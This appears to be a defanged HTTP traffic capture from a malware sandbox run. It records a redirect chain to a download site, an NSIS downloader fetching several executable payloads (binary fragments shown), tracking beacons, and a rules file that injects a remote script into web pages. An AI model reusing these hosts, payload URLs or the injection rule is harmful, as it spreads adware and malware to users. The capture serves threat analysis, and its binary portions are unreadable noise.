Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107

0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F......0.0... .....0...
0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..2015043
0130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
....F........20150430130944Z....20150507130944Z0...*.H.............<
;....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g.
.w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e
...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'.
.........}=......J. ....I...|@zj..._J(.... ...HTTP/1.1 200 OK..Content
-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT.
.Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-ag
e=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protectio
n: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:
quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z.
/..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v.
...b..Z./.....F........20150430130944Z....20150507130944Z0...*.H......
.......<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f....
.{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....
%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._
....2...'..........}=......J. ....I...|@zj..._J(.... .....
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 867
Date: Thu, 30 Apr 2015 23:11:56 GMT
Connection: keep-alive
0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root 
CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..29
0318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.
0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(..
.v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..
h..'.8...>..&Y.s....&.....[...`.I.(.i;...(....aW7.t..t.:.r/.......=
...3.. .S.:.s..A. :......O..2`.W....hh.8&`u..w..... [email protected].^....w.
d.z._....b..l.Ti....n...qv.i.........B0@0...U...........0...U.......0.
...0...U........K...E$.MP.c.......0...*[email protected].
...A.....(.3.k.t...-..........sgJ..D{x..nlo.).39E....Wl.....S.-.$l..c.
.ShgV>...5!..h....S......]F...zX(./....7A..Dm.S(.~.g.........L'.L.s
sv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%..@.;,.x.a
/....Uo.....M.(.r..bPe.....1....GX?_HTTP/1.1 200 OK..Content-Type: app
lication/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT.
.Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS
/7.5..X-Powered-By: ASP.NET..Content-Length: 867..Date: Thu, 30 Apr 20
15 23:11:56 GMT..Connection: keep-alive..0.._0..G.............!XS..0..
.*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1
.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....Globa
lSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.
H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R..
.Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.
<<< skipped >>>


GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 594
Connection: keep-alive
Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482884
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edbc30fe046d-FRA
0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U.
...GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*.
.......1..F...141125000000Z0.0...U.......0*........%[email protected]
Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U..
.....0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B
.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R.
 .....rS....t.T_.....Y.R......p OS..2.s........(C.e.x3.#.d6L.d=.UI.;T.
.G...mx....... .......-........-.....J....$.Ko.e#......3....*..3.s...0
.........N..W?'.U...f..h..e...m.9.HTTP/1.1 200 OK..Date: Thu, 30 Apr 2
015 23:11:56 GMT..Content-Type: application/x-pkcs7-crl..Content-Lengt
h: 594..Connection: keep-alive..Set-Cookie: __cfduid=d25feb04b850f5798
1ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=
/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:0
0 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: pu
blic, max-age=6482884..CF-Cache-Status: HIT..Accept-Ranges: bytes..Ser
ver: cloudflare-nginx..CF-RAY: 1df6edbc30fe046d-FRA..0..N0..6...0...*.
H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0.
..U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141
125000000Z0.0...U.......0*........%[email protected]*
........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0..
...K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.
r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t
<<< skipped >>>


GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119928, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:15:51 GMT
Expires: Sat, 02 May 2015 10:15:51 GMT
ETag: "b2a2c0ce8f0f9b25572e41e1706cd0a01fa1f1ef"
Content-Length: 1741
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Ari
zona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Dad
dy Root Validation Authority - G2..20150430221551Z0d0b0:0... .........
#o..K......#..... ...:....g(.....An ............20150430221551Z....201
50502101551Z0...*.H.............oI..C>./|..o.....{.#..C....a.......
V. H..j"P.....*M:m...&...s.....5/|49..|.....N....6..{.Z...H.I,..(...,.
...\k..w.%A....@.......)f.>:.;..^. .k...}.]._...?=bF?.....J.:.O.$..
 .N..O.......Bg......9....UYx.".....\..W..]L..0.I_.....g..f..I.8....K^
.;....oK.R........0...0...0..q..........t....o0...*.H........0..1.0...
U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, 
Inc.110/..U...(Go Daddy Root Certificate Authority - G20...15031607000
0Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsda
le1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Auth
ority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=
.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..
T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X
.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A.
...Fk.T..24.0B...p.........0..0...U.......0.0...U...........0...U.%..0
... ......... .......0...U.......O........f...e..r..0... .....0......0
@..U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U
. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository
/0...*.H.............bW%D.2.X..U[0d..........|.BaG.Y.?.u...\...M..
<<< skipped >>>


GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {.    .    ApiBlock = false;.    //docume
nt.write(unescape(""));.    .    .        .    docume
nt.write(unescape(""));.    function MobiMi
dia_addOption(selectId, txt, val, selected) {..var objOption = new Opt
ion(txt, val, selected);..self.document.getElementById(selectId).optio
ns.add(objOption);.    }.    function MobiMidia_keyNumber(e) {.       
 if (e.keyCode != 9 && e.keyCode != 13) {.            var keyChar = St
ring.fromCharCode(e.which ? e.which : e.keyCode);.            filtered
Values = "1234567890";.            if ((filteredValues.indexOf(keyChar
) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 4
6)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(key
Char.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return fal
se;.        }.    }.    function MobiMidia_AtivaCel() {.        if (se
lf.document.getElementById('MobiMidia_DDD').value.length == 2) {.     
       self.document.getElementById('MobiMidia_Number').focus();.     
   }.    }.    .    function MobiMidia_NonoDigito() {.        if (self
.document.getElementById('MobiMidia_DDD').value < 30) {.       
<<< skipped >>>


GET /ironsrc_prot.png?nocache=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: desprotetordelinks.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:09 GMT
Content-Type: image/png
Content-Length: 14566
Connection: keep-alive
Last-Modified: Mon, 16 Mar 2015 23:54:21 GMT
ETag: "5720b2-38e6-5117091a3e540"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
.PNG........IHDR...&.........2.K.....pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Thu, 30 Apr 2015 23:11:15 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Mar 2015 16:17:41 GMT..ETag: "804047d4e66d01:0"..C
ache-Control: max-age=86400..Date: Thu, 30 Apr 2015 23:11:15 GMT..Conn
ection: keep-alive..



GET /310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 36948
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................0...............................................s.
...... ...............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc........ .......v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 688202
Last-Modified: Sat, 11 Apr 2015 13:41:40 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
................@[email protected].....
[email protected].......................
......................................................................
..............CODE....d........................... ..`DATA....L.......
....................@...BSS......................................idata
[email protected]................................
[email protected]....................
[email protected][email protected].............@..
[email protected]..............................................
......................................................................
..............................................string................&l
t;[email protected].@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance.
.L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameI
s...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsF
rom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>

GET /310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523272
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ...............................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>

GET /310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........;...;...
;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.
6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U......
...........<...T......3o.......P....@..............................
[email protected].........................
.`........;..`[email protected].......
........................text....:.......<.................. ..`.rda
ta...(...P...*...@..............@[email protected]............
[email protected]...............................@[email protected]..................
[email protected]......................................................
......................................................................
......................................................................
......................................................................
......................................................................
..U..V...y-...E..t.V..6.......^]...................O-.............U..j
.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F.
..F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,.
.h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..
$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F
......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.
......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>

GET /310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 101527
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_cp.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^.
.K.................b...........6............@.........................
.........................................................p............
......................................................................
.............................text....a.......b.................. ..`.r
data...............f..............@[email protected]..........
[email protected]........
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
[email protected]...`[email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] ...Pj.h.[[email protected].@._^3.
[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>

GET /310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 401 Unauthorized
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
0......


GET /310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........x....u...u.
..u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u...
....u.......u.......u.Rich..u.........................PE..L......T....
......................................@...............................
........@..................................|..........(...............
.........)[email protected].....
.......................text............................... ..`.rdata..
............................@[email protected]....:...........v..............@.
...rsrc...(...........................@[email protected]...).......*..........
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................j...4.....................
..........t.j.j.j.P....D...P....D.....................3.9.............
....t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D.
..P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..........
........=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.
d......E..}....LD......3.3..O.._.f.W..][email protected]..^.f....
.Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x...........
................................._l._p.......Gh....._`._d.........
<<< skipped >>>


GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 30 Apr 2015 23:07:04 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^...
..Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!
.4. #5<G....h....{... ./k_..........3..u.}.z.. ....HTTP/1.1 301 Mov
ed Permanently..Content-Type: text/html; charset=UTF-8..Cache-Control:
 no-cache, no-store, max-age=0, must-revalidate..Pragma: no-cache..Exp
ires: Fri, 01 Jan 1990 00:00:00 GMT..Date: Thu, 30 Apr 2015 23:07:04 G
MT..Location: hXXp://VVV.4threquest.me/registro/310113f8.htm..Content-
Encoding: gzip..X-Content-Type-Options: nosniff..X-Frame-Options: SAME
ORIGIN..X-XSS-Protection: 1; mode=block..Content-Length: 191..Server: 
GSE..Alternate-Protocol: 80:quic,p=1............m....0.D.|ES.T..cJ.."&
...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a
$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_...
.......3..u.}.z.. ......



GET /v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.97 ms","message":"store 3 action and 5 upd
ate "}..0......


GET /v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 201
5 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"1.25 ms","message":"store 1 act
ion and 0 update "}..0..



GET /services/rules.txt?dummy=328 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:24 GMT
Content-Type: text/plain
Content-Length: 197
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT
ETag: "57c94d-c5-514f84ca6d480"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js
"></script></head>.{njax_null}|<script src="hXXps://
VVV.njaxjs.me/services/script.js" type="text/javascript"></scrip
t>.ncupons|nncupons.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu
, 30 Apr 2015 23:07:24 GMT..Content-Type: text/plain..Content-Length: 
197..Connection: keep-alive..Last-Modified: Thu, 30 Apr 2015 22:05:54 
GMT..ETag: "57c94d-c5-514f84ca6d480"..P3P: CP="Potato"..X-Cache: MISS.
.X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow
